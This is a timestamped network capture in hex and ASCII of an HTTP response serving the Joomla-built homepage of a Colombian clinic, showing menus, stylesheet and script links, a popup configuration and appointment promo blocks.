                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5417INData Raw: 37 63 62 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 7cb3<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5418INData Raw: 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 72 74 5f 73 61 6c 69 65 6e 74 2f 63 75 73 74 6f 6d 2f 63 73 73 2d 63 6f
                                                                                                                                                                                                                                                                          Data Ascii: afancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/templates/rt_salient/custom/css-co
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5419INData Raw: 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61
                                                                                                                                                                                                                                                                          Data Ascii: 1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstrap.min.js?989da4646a1a0dfff9a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5420INData Raw: 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74 72 79 20 73 69 74 65 20 63 6f 6d 5f 67 61 6e 74 72 79 35 20 76 69 65 77 2d 63 75 73
                                                                                                                                                                                                                                                                          Data Ascii: .css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gantry site com_gantry5 view-cus
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5422INData Raw: 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22
                                                                                                                                                                                                                                                                          Data Ascii: ticle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><div class="g-menu-item-container"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5423INData Raw: 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20
                                                                                                                                                                                                                                                                          Data Ascii: 5 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li class="g-menu-item g-menu-item-type-component
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5424INData Raw: 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 51 75 69 c3 a9 6e 65 73 20 73 6f 6d 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20
                                                                                                                                                                                                                                                                          Data Ascii: lass="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span class="g-separator g-menu-item-content"> <span class="g-menu-item-title">Quines somos </span></span><span
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5426INData Raw: 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 56 61 6c 6f 72 65 73 20
                                                                                                                                                                                                                                                                          Data Ascii: ></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-content"><span class="g-menu-item-title">Valores
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5427INData Raw: 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 73 75 62 6c 65 76 65 6c 22 3e
                                                                                                                                                                                                                                                                          Data Ascii: entes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div class="g-block size-100"><ul class="g-sublevel">
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5428INData Raw: 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                          Data Ascii: ucacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-i
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5430INData Raw: 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 39 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d
                                                                                                                                                                                                                                                                          Data Ascii: enu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-399 "><a class="g-m
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5431INData Raw: 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 39 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                                          Data Ascii: class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-119 "><a class="g
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5432INData Raw: 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 38 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20
                                                                                                                                                                                                                                                                          Data Ascii: ><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component g-menu-item-388 g-standard "><a class="g-menu-item-container"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5434INData Raw: 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f 75 6e 64 20 63 6f 6c 6f 72 2a 2f 0d 0a 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 2f 2a 70 6f 70 75 70 20 66 6f 6e 74 20 63 6f 6c 6f 72 2a 2f 0d 0a 62 6f 72 64 65 72 2d 72 61 64 69 75
                                                                                                                                                                                                                                                                          Data Ascii: er {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup background color*/color: rgba(0, 0, 0, 0);/*popup font color*/border-radiu
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5435INData Raw: 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 22 3e 3c 2f 64 69 76 3e 27 2c 0d 0a 09 09 09 09 77 72 61 70 20 20 20 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 77 72 61 70 22 20
                                                                                                                                                                                                                                                                          Data Ascii: oHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancybox-overlay379"></div>',wrap : '<div class="gafancybox-wrap"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5436INData Raw: 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 22 20 73 72 63 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><img style="display: block; margin-left: auto; margin-right: auto;" src="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5438INData Raw: 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61 2d 6d 65 64 69 63 61 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 34 22 3e 41 67 65 6e 64 61 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f
                                                                                                                                                                                                                                                                          Data Ascii: t="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita-medica" class="button button-4">Agenda</a></div></div></div> </div></div></div></div></sectio
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5439INData Raw: 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 31 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 33 2f 50 61 67 69 6e 61 5f 57 65 62 5f 31 2d 30 31 2e 6a 70 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61
                                                                                                                                                                                                                                                                          Data Ascii: size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-animatedblock-animation-1"><img src="/images/2023/Pagina_Web_1-01.jpg" alt="image" /><div class="g-a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5440INData Raw: 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d
                                                                                                                                                                                                                                                                          Data Ascii: f="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-prom
